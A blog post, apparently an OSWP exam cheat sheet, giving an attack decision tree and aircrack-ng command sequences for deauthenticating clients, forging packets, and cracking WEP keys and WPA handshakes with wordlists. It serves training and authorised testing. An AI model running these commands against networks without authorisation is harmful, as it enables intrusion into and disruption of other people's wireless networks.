<h1>Wireless Penetration Testing #Cheat Sheet</h1>
<p>Published 2021-05-13 (last modified 2021-05-13) at <a href="https://berenkudaygorun.com/blog/blog/2021/05/13/wireless-pentest-cheat-sheet/">berenkudaygorun.com</a>. Categories: cheat-sheet, wireless. Tag: oswp.</p>
<p>I actually prepared this cheat sheet for my OSWP exam, but of course I will keep developing it and gradually bring it to a state where I can also use it in wireless tests. Even as it stands, though, I think it is a nice cheat sheet. Especially in a lab environment, a cheat sheet like this will be very useful to you. Let's get started!</p>
<p>First, let's build our Attack Map for OSWP. Yes, while creating this page I drew quite a lot of inspiration from <a href="https://github.com/brcyrr" title="Burcu Yarar">Burcu Yarar</a>.</p>
<h3>Attack Map</h3>
<pre><code class="language-sh">WEP or WPA/WPA2?
- WEP
- - Open Authentication or Shared Key Authentication?
- - - Open Authentication
- - - - Is any client connected to the network?
- - - - - Yes, connected:
- - - - - - # ARP Request Replay Attack
- - - - - - # Interactive Packet Replay Attack
- - - - - No, not connected:
- - - - - - # KoreK ChopChop Attack
- - - - - - # Fragmentation Attack
- - - Shared Key Authentication
- - - - Is any client connected to the network?
- - - - - Yes, connected:
- - - - - - # Fake Shared Key Authentication Attack
- - - - - - # ARP Request Replay Attack
- - - - - No, not connected:
- - - - - - Wait for a client...

- WPA/WPA2
- - Is any client connected to the network?
- - - Yes, connected:
- - - - # Capture the 4-way handshake and crack it
- - - No, not connected:
- - - - Wait for a client...</code></pre>
<p>Note: the grouped commands for the attack types marked with # at the final stage of the Attack Map above are at the bottom of this post. You can jump directly to the commands under those headings.</p>
<hr>
<h2>Commands That May Be Useful</h2>
<p><strong>Adding a new interface:</strong></p>
<pre><code class="language-sh">iw dev wlan0 interface add mon0 type monitor
ifconfig mon0 up</code></pre>
<p><strong>Deleting an interface:</strong></p>
<pre><code class="language-sh">iw dev mon0 interface del</code></pre>
<p><strong>Monitor Mode:</strong></p>
<pre><code class="language-sh">airmon-ng start wlan0 1
---------
iw dev wlan0 interface add mon0 type monitor
ifconfig mon0 up</code></pre>
<p><strong>Current frequency:</strong></p>
<pre><code class="language-sh">iwlist wlan0mon channel</code></pre>
<p><strong>Current MAC address:</strong></p>
<pre><code class="language-sh">macchanger wlan0mon -s</code></pre>
<p><strong>Decrypting encrypted packets with airdecap-ng:</strong></p>
<pre><code class="language-sh">airdecap-ng -w 0000000000 web-shared-01.cap
---------
airdecap-ng -e 'test' -p 'mjdpPd4D' wpa2-01.cap -b '7A:2B:C1:63:BD:64'</code></pre>
<p><strong>Fake Authentication:</strong></p>
<pre><code class="language-sh">aireplay-ng -1 0 -e &lt;ESSID&gt; -a &lt;AP MAC&gt; -h &lt;Your MAC&gt; &lt;interface name&gt;</code></pre>
<p><strong>Shared Key Fake Authentication:</strong></p>
<pre><code class="language-sh">aireplay-ng -1 0 -e &lt;ESSID&gt; -y &lt;sharedkey&gt; -a &lt;AP MAC&gt; -h &lt;Your MAC&gt; &lt;interface&gt;</code></pre>
<p><strong>ARP Request Replay Attack:</strong></p>
<pre><code class="language-sh">aireplay-ng -3 -b &lt;AP MAC&gt; -h &lt;Source MAC&gt; &lt;interface name&gt;</code></pre>
<p><strong>Deauthentication Attack:</strong></p>
<pre><code class="language-sh">aireplay-ng -0 1 -a &lt;AP MAC&gt; -c &lt;Client MAC&gt; &lt;interface name&gt;
---------
aireplay-ng -0 1 -a &lt;AP MAC&gt; &lt;interface name&gt;</code></pre>
<p><strong>Creating an ARP Request packet:</strong></p>
<pre><code class="language-sh">packetforge-ng -0 -a &lt;AP MAC&gt; -h &lt;Your MAC&gt; -k &lt;Dest IP&gt; -l &lt;Source IP&gt; -y &lt;xor file&gt; -w &lt;output file&gt;</code></pre>
<p><strong>KoreK ChopChop attack with aireplay-ng:</strong></p>
<pre><code class="language-sh">aireplay-ng -4 -b &lt;AP MAC&gt; -h &lt;Source MAC&gt; &lt;interface&gt;</code></pre>
<p><strong>Interactive Packet Replay Attack:</strong></p>
<pre><code class="language-sh">aireplay-ng -2 -r &lt;packet filename&gt; &lt;interface&gt;</code></pre>
<hr>
<h2>Commands Built for the Attack Map</h2>
<p><strong>Cracking WEP Without Client - # KoreK ChopChop Attack:</strong></p>
<pre><code class="language-sh">airodump-ng wlan0mon --bssid &lt;AP MAC&gt; -c &lt;AP CHANNEL&gt; -w ChopChop
aireplay-ng -1 6000 -o 1 -q 10 -e &lt;ESSID&gt; -a &lt;AP MAC&gt; -h &lt;Your MAC&gt; &lt;interface name&gt;
aireplay-ng -4 -b &lt;AP MAC&gt; -h &lt;Source MAC&gt; &lt;interface&gt;
packetforge-ng -0 -a &lt;AP MAC&gt; -h &lt;Your MAC&gt; -k &lt;Dest IP&gt; -l &lt;Source IP&gt; -y &lt;xor file&gt; -w &lt;output file&gt;
aireplay-ng -2 -r &lt;packet filename&gt; &lt;interface&gt;
aircrack-ng ChopChop-01.cap</code></pre>
<p><strong>Cracking WEP With Client - # ARP Request Replay Attack:</strong></p>
<pre><code class="language-sh">airodump-ng wlan0mon --bssid &lt;AP MAC&gt; -c &lt;AP CHANNEL&gt; -w webWithClient
aireplay-ng -1 0 -e &lt;ESSID&gt; -a &lt;AP MAC&gt; -h &lt;Your MAC&gt; &lt;interface name&gt;
aireplay-ng -3 -b &lt;AP MAC&gt; -h &lt;Source MAC&gt; &lt;interface name&gt;
aireplay-ng -0 1 -a &lt;AP MAC&gt; &lt;interface name&gt;
aircrack-ng webWithClient-01.cap</code></pre>
<p><strong>Cracking WEP via a Client - # Interactive Packet Replay Attack:</strong></p>
<pre><code class="language-sh">aireplay-ng -1 6000 -o 1 -q 10 -e &lt;ESSID&gt; -a &lt;AP MAC&gt; -h &lt;Your MAC&gt; &lt;interface name&gt;
airodump-ng wlan0mon --bssid &lt;AP MAC&gt; -c &lt;AP CHANNEL&gt; -w webViaClient
aireplay-ng -2 -a &lt;bssid MAC address&gt; -d FF:FF:FF:FF:FF:FF -m 68 -n 68 -t 1 -f 0 &lt;interface&gt;
aircrack-ng webViaClient-01.cap</code></pre>
<p><strong>WEP Shared Key Authentication Attack - # Fake Shared Key Authentication Attack:</strong></p>
<pre><code class="language-sh">airodump-ng -c &lt;AP channel&gt; --bssid &lt;AP MAC&gt; -w &lt;capture&gt; &lt;interface&gt;
aireplay-ng -0 1 -a &lt;AP MAC&gt; -c &lt;Client MAC&gt; &lt;interface&gt;
aireplay-ng -1 0 -e &lt;ESSID&gt; -y &lt;keystream file&gt; -a &lt;AP MAC&gt; -h &lt;Your MAC&gt; &lt;interface&gt;
aireplay-ng -3 -b &lt;AP MAC&gt; -h &lt;Your MAC&gt; &lt;interface&gt;
aireplay-ng -0 1 -a &lt;AP MAC&gt; -c &lt;Client MAC&gt; &lt;interface&gt;
aircrack-ng &lt;capture&gt;</code></pre>
<hr>
<h2>Extra</h2>
<p><strong>Cracking WPA via Airolib-ng:</strong></p>
<pre><code class="language-sh">echo wifu &gt; essid.txt
airolib-ng wifu --import essid essid.txt
airolib-ng wifu --stats
airolib-ng wifu --import passwd &lt;wordlist file&gt;
airolib-ng &lt;db name&gt; --batch
aircrack-ng -r &lt;db name&gt; &lt;capture&gt;</code></pre>
<p><strong>Cracking WPA via John:</strong></p>
<pre><code class="language-sh">john --wordlist=/usr/share/john/password.lst --rules --stdout | aircrack-ng -w - john-01.cap -e Huawei_HG655d</code></pre>
<pre><code class="language-sh">john --wordlist=/usr/share/john/password.lst --rules --stdout --session=wpa | aircrack-ng -w - john-01.cap -e Huawei_HG655d
# Since we saved it as a session, when we exit aircrack-ng we can resume cracking from where we left off with --restore.
john --restore=wpa | aircrack-ng -w - john-01.cap -e Huawei_HG655d</code></pre>
<p><strong>Dynamic Wordlist with Crunch</strong></p>
<pre><code class="language-sh">crunch 8 8 12345678 | john --stdin --session=wpa --stdout | aircrack-ng -w - wpa-01.cap -b 7A:2B:C1:63:BD:64</code></pre>
<pre><code class="language-sh">crunch 8 8 12345678 | john --restore=wpa | aircrack-ng -w - wpa-01.cap -b 7A:2B:C1:63:BD:64</code></pre>